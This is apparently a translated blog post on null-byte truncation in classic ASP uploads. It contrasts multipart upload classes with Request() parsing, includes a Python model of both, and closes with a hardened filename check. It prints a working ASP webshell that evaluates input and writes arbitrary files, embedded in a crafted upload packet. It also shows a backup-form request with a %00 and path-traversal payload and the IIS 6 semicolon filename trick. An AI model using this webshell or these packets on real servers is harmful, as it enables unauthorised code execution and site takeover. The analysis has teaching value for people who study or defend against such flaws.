POST /coin/upload.asp?Action=upfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer:
phpwind recently had a vulnerability that has been exploited through local file inclusion to get a shell: with magic_quotes off, %00 truncates the string, so the included path can be built at will. That is not today's topic, though. Today's topic is the classic upload trick: a \00 truncation of the filepath parameter to control the extension of the saved file.
The upload packet is as follows:
Upload/2010/2/201002232155064073.gif
-----------------------------7d9138191ce08bc
Content-Disposition: form-data; name="valcode"

6918
-----------------------------7d9138191ce08bc
Content-Disposition: form-data; name="file_name1"; filename="D:\hacker\xiaoma.gif"
Content-Type: text/plain

<% Eval Request("#") %>
<% On Error Resume Next %>
<% ofso = "Scripting.FileSystemObject" %>
<% Set fso = Server.CreateObject(ofso) %>
<% path = Request("path") %>
<% If path <> "" Then %>
<% data = Request("dama") %>
<% Set dama = fso.CreateTextFile(path, True) %>
<% dama.Write data %>
<% If Err = 0 Then %>
<% = "Success" %>
<% Else %>
<% = "False" %>
<% End If %>
<% Err.Clear %>
<% End If %>
<% dama.Close %>
<% Set dama = Nothing %>
<% Set fso = Nothing %>
<% = "<form action='' method=post>" %>
<% = "<input type=text name=path>" %>
<% = "<br>" %>
<% = Server.MapPath(Request.ServerVariables("script_name")) %>
<% = "<br>" %>
<% = "" %>
<% = "<textarea name=dama cols=70 rows=30 width=30></textarea>" %>
<% = "<br>" %>
<% = "<input type=submit value=save>" %>
<% = "</form>" %>
-----------------------------7d9138191ce08bc
Content-Disposition: form-data; name="submit"

Upload
-----------------------------7d9138191ce08bc--
If nothing goes wrong, the webshell is uploaded.
In practice we often run into an admin backend with a database backup function that appends .mdb to the backup filename, like the following code.
Sub BackupData()
    ' All three values come straight from the form; none of them is validated
    dbPath = Request.Form("DBpath")
    dbPath = Server.MapPath(dbPath)
    bkFolder = Request.Form("bkfolder")
    bkDBName = Request.Form("bkdbname")
    Set fso = Server.CreateObject("Scripting.FileSystemObject")
    If fso.FileExists(dbPath) Then
        If CheckDir(bkFolder) = True Then
            Response.Write bkFolder & "\" & bkDBName & ".mdb"   ' I printed the target path out for debugging
            fso.CopyFile dbPath, bkFolder & "\" & bkDBName & ".mdb"
        Else
            MakeNewsDir bkFolder
            fso.CopyFile dbPath, bkFolder & "\" & bkDBName & ".mdb"
        End If
        Response.Write "Database backup complete. Please continue with other operations. Download the backup over FTP to keep your data safe."
    Else
        Response.Write "The file you want to back up cannot be found!"
    End If
End Sub

Function CheckDir(folderPath)
    folderPath = Server.MapPath(".") & "\" & folderPath
    Set fso1 = CreateObject("Scripting.FileSystemObject")
    If fso1.FolderExists(folderPath) Then
        CheckDir = True
    Else
        CheckDir = False
    End If
    Set fso1 = Nothing
End Function

Function MakeNewsDir(folderName)
    Set fso1 = CreateObject("Scripting.FileSystemObject")
    Set f = fso1.CreateFolder(folderName)
    MakeNewsDir = True
    Set fso1 = Nothing
End Function
The usual trick is to name the backup 1.asp;asp.mdb, which IIS 6 executes as ASP because of its semicolon parsing quirk, and use it as a webshell.
But what if we are out of luck and the server is IIS 7 or Apache?
The clever-seeming idea is to use null-byte truncation here as well.
The modified packet is as follows:
POST /bjxshop/admin/Backup.asp?Action=Backup HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://localhost/bjxshop/admin/backup.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: localhost
Content-Length: 79
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSASTTAR=egg?hbcahnkpgpoeookifb

DBpath=..%2Fdata%2F%23bjxshop.mdb&bkfolder=..%2FDatabackup&bkDBname=shop.asp%00
Because of URL encoding, the \00 is sent as %00.
After submitting it with nc, the result is not what you would expect: shop.asp.mdb.
Not truncated!
This was tested on a local IIS 5.0.
After thinking about it for a long time I finally found a clue.
I searched online and tested it locally.
<%
If Request.QueryString <> "" Then
    id = Request.QueryString("id")
    Response.Write "Get: "
    Response.Write id & ".mdb"
End If
%>
Save it as re.asp.
Request re.asp?id=111%00111
The output keeps only the characters before %00.
This is a property of the Request object: Request("parameter") is cut at %00, and %00 and everything after it is discarded. The .mdb appended afterwards by the script is therefore never truncated away.
So why can the filepath variable in the upload be truncated?
Compare the two packets.
A file-upload form uses enctype="multipart/form-data".
An ordinary form declares no enctype, so the default applies: Content-Type: application/x-www-form-urlencoded.
For the details of the difference, look at how a no-component upload class works (I have not written one myself, it is too much trouble, but the principle is easy to follow).
With multipart/form-data the ASP Request object does not parse the fields at all. The no-component upload class reads the raw request body (Request.BinaryRead) and splits it on the boundary itself, since the format is fixed, to obtain the file name, the file content and the PATH value. Because PATH is obtained by splitting the raw bytes, the evil \00 is retained and passed through to the file system when the file is saved, and the C-level file API stops at the null byte.
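To make the difference concrete, here is an added example (my own illustration, not code from the original post or from any real upload class) that models both parsing paths in Python: a splitter that, like a no-component upload class, keeps every byte of a multipart field, and a model of classic ASP Request() that cuts a urlencoded value at %00, as the re.asp test above shows. It also runs the backup form's bkDBname through the Request model and shows the check the upload code should do instead. The request bodies are constructed from the packets above, not real captures; the field name filepath, the generated file name 201002232155064073 and the truncate-at-NUL file API are assumptions made for the demonstration.

```python
import re
from urllib.parse import unquote_to_bytes

BOUNDARY = b"---------------------------7d9138191ce08bc"

# Constructed request body modelled on the upload packet above, not a real
# capture. The (assumed) filepath field carries an embedded NUL after ".asp".
MULTIPART_BODY = (
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="filepath"\r\n\r\n'
    b"Upload/2010/2/xiaoma.asp\x00\r\n"
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="file_name1"; filename="D:\\hacker\\xiaoma.gif"\r\n'
    b"Content-Type: text/plain\r\n\r\n"
    b'<% Eval Request("#") %>\r\n'
    b"--" + BOUNDARY + b"--\r\n"
)

# Constructed body of the backup form, same values as the packet above.
BACKUP_QUERY = ("DBpath=..%2Fdata%2F%23bjxshop.mdb"
                "&bkfolder=..%2FDatabackup&bkDBname=shop.asp%00")


def split_multipart(body: bytes, boundary: bytes) -> dict:
    """Model of a no-component upload class: split the raw body (what
    Request.BinaryRead returns) on the boundary and keep every byte of
    each field verbatim, so an embedded NUL is preserved."""
    fields = {}
    for chunk in body.split(b"--" + boundary):
        chunk = chunk.strip(b"\r\n")
        if not chunk or chunk == b"--":
            continue
        headers, _, value = chunk.partition(b"\r\n\r\n")
        m = re.search(rb'\bname="([^"]*)"', headers)
        if m:
            fields[m.group(1).decode()] = value
    return fields


def asp_request_get(query: str, name: str) -> str:
    """Model of classic ASP Request(name) on a urlencoded body: the decoded
    value is cut at the first NUL, which is what the re.asp test shows."""
    for pair in query.split("&"):
        key, _, val = pair.partition("=")
        if key == name:
            raw = unquote_to_bytes(val.replace("+", " "))
            return raw.split(b"\x00", 1)[0].decode("latin-1")
    return ""


def file_api_path(path: bytes) -> str:
    """Assumed file API behaviour: a C-string path stops at the first NUL."""
    return path.split(b"\x00", 1)[0].decode("latin-1")


def saved_name_via_upload_class(body: bytes) -> str:
    """Upload flow: filepath comes from the multipart splitter, the server
    appends its own generated name and .gif, then opens the file."""
    fields = split_multipart(body, BOUNDARY)
    target = fields["filepath"] + b"/201002232155064073.gif"
    return file_api_path(target)


def saved_name_via_backup_form(query: str) -> str:
    """Backup flow: bkDBname comes through Request.Form, which has already
    dropped the NUL before the script appends .mdb."""
    return asp_request_get(query, "bkDBname") + ".mdb"


ALLOWED_EXT = {".gif", ".jpg", ".jpeg", ".png"}


def hardened_target(client_name: bytes, generated: str = "201002232155064073") -> str:
    """What the upload class should do instead: refuse NUL or control bytes,
    take only the extension from the client name and whitelist it, and build
    the saved name from a server-generated stem, so neither the directory nor
    the stem (and therefore no ';' trick either) is under client control."""
    if any(c < 0x20 for c in client_name):
        raise ValueError("control byte in filename")
    name = client_name.decode("latin-1").replace("\\", "/").rsplit("/", 1)[-1]
    ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed: " + repr(ext))
    return "Upload/" + generated + ext


if __name__ == "__main__":
    print(saved_name_via_upload_class(MULTIPART_BODY))   # Upload/2010/2/xiaoma.asp
    print(saved_name_via_backup_form(BACKUP_QUERY))      # shop.asp.mdb
    print(hardened_target(b"D:\\hacker\\xiaoma.gif"))    # Upload/201002232155064073.gif
```

The two flows end with different files for the same reason the post gives: the multipart splitter hands the file API a path that still contains the NUL, so the server-appended name after it is lost, while Request() has already thrown the NUL away before the script appends .mdb. The hardened version does not try to strip the NUL and keep going; it rejects the request, ignores the client's directory and stem entirely, and only trusts a whitelisted extension.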
PS: when testing the phpwind local inclusion vulnerability, %00 in a GET parameter is also kept, probably because of how PHP works: with magic_quotes off PHP leaves the null byte in the string, and the truncation happens later in the C-level file functions.
That is all of this small personal finding. It may not get you a shell, but I am a little proud of having tested it myself.